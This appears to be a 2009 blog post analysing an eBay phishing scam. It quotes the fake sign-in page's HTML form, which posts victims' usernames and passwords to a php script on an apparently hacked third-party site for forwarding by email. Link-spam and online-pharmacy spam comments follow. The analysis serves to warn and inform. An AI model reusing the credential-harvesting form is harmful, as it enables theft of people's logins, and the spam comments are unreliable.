Spams and Scams on eBay

Today I was checking my spam folder when I noticed a message from an “eBay seller”. I don’t use that address for eBay, so I knew that it was a fake, but decided to check it out anyway.

The email was a very good fake, and, besides being sent from an address at “ebay.corn.au“, it showed few other telltale signs that it was fraudulent.

Down at the bottom of the message were links to the supposed “dispute” for the item I had bid on. Usually phishing emails like this direct you to an address that is very similar to, but not actually, the real thing. However these links were all straight to eBay’s site.

Sometimes they try to fool you by using Javascript to change the mouseover text to a real URL, even though the link actually goes to the scam page. So I clicked on one of the links.

The link took me through to an actual eBay address, specifically, a member’s “About Me” page. The interesting about what happened was that I could see the “about me” page loading, but it was promptly replaced with what appeared to be a very genuine eBay sign in screen.

None of the text is selectable and none of the links are clickable (except for Sign In), which should set off alarm bells in anyone’s head. The User ID box also has a suspicious-looking double-thickness gray line at the bottom. It turns out the page is mostly comprised from images, hosted on tinypic.com, and no real text at all. Clearly a fake login screen.

I viewed the page’s source and found some interesting things.

Firstly, the login details form is submitted to a Danish Taxi website. It would appear that this site is running a php script that forwards any details received to an email address stored as a hidden value in the form. The form submit is below:

<form method="post" id="frm"name="SignInForm" style="margin:0px"
action="http://bjerringbrotaxi.dk/lnfo.php" autocomplete="off">
<TR><INPUT type=hidden value=something@example.com name=mail>
<INPUT type=hidden value=http://example.com name=link1>

I tested this theory by making a HTML document on my PC and changing the submit address to an account I own. Then I entered some fake details and submitted the form. After submitting the form, I was redirected to an eBay auction address (replaced above by http://example.com).

A few seconds later I received this email:

To summarise: when a user enters their details, a form submits their username, password, an email address, and a redirect URL to a php script running on a Danish Taxi website. The login details, along with their IP address, are sent to the email address specified in the submit, and the user is redirected to another page, also specified in the submit.

Now you might be wondering, why a Danish Taxi website? There are several possible answers. The script could have been set up by an unscrupulous website administrator, however, more likely is that the site was hacked instead.

How did they change their eBay user page? One way would be to simply type the HTML/Javascript code in their About Me description box, and, using some tricky Javascript, have the browser display their own page “over” the top of the genuine eBay page. This would not work if eBay parse the information and filter out any extraneous tags. Not doing so would be poor form on eBay’s behalf, so I suspect that maybe the scammer is using another method.

Shortly before writing this, I submitted a report to eBay about this particular scam. As of now the page is still up. We’ll see if eBay have it down by the morning.

Edit: As of two days later, the scam page is still there. Pretty slack on eBay’s behalf.

Update: It is now the 8th of October, twelve days later, and I just received an email from eBay thanking me for my report and telling me what I already knew: that the page is a phishing scam. However, it’s still up! Tinypic have deleted the images, and the Danish taxi website have fixed their hacked webserver by removing the php script. But the eBay members page with the dodgy code is still there!

Saturday, September 26th, 2009 Internet

7 Comments to Spams and Scams on eBay

  1. Pillspot.org. Canadian Health&Care.Special Internet Prices.No prescription online pharmacy.Pillspot.org. Vitamins@buy.online” rel=”nofollow”>.…

    Categories: Anxiety/Sleep Aid.Antibiotics.Anti-allergic/Asthma.Womens Health.Mens Health.Skin Care.Vitamins/Herbal Supplements.Eye Care.Antiviral.Antidepressants.Antidiabetic.Mental HealthWeight Loss.Blood Pressure/Heart.Pain Relief.Stop SmokingSt…

    2. JOSEPH on June 26th, 2010

  2. uk MacBook Apple/ http://AWESOMEBABYCLOTHES.INFO/tag/r\x3dh : uk MacBook Apple/…

    r\x3dh…

    3. r\x3dh on August 29th, 2010

  3. Colleges http://ltopbbq.ABABYCLOTHES.INFO/tag/Colleges+eyeliner+top/ : Colleges…

    eyeliner…

    4. Colleges on August 29th, 2010

  4. cable http://llexmarkjrzhq.01DODGEPARTS.US/tag/r2+x75+cable/ : x75…

    r2…

    5. x75 on August 29th, 2010

  5. steamer http://nvegetablexelg9-p.bestpartsstore.info/tag/Wal-Mart+Appliances+steamer+Microwave/ : Microwave…

    Microwave…

    6. steamer on August 30th, 2010

  6. Carpet http://fberberon0eh.AWESOMEBABYCLOTHES.INFO/tag/antique+Carpet+berber/ : antique…

    berber…

    7. berber on August 30th, 2010

  7. Brand http://tvaluekqy.bestpartsstore.info/tag/Brand+frozen+maker/ : frozen…

    frozen…

    8. maker on August 30th, 2010

Leave a comment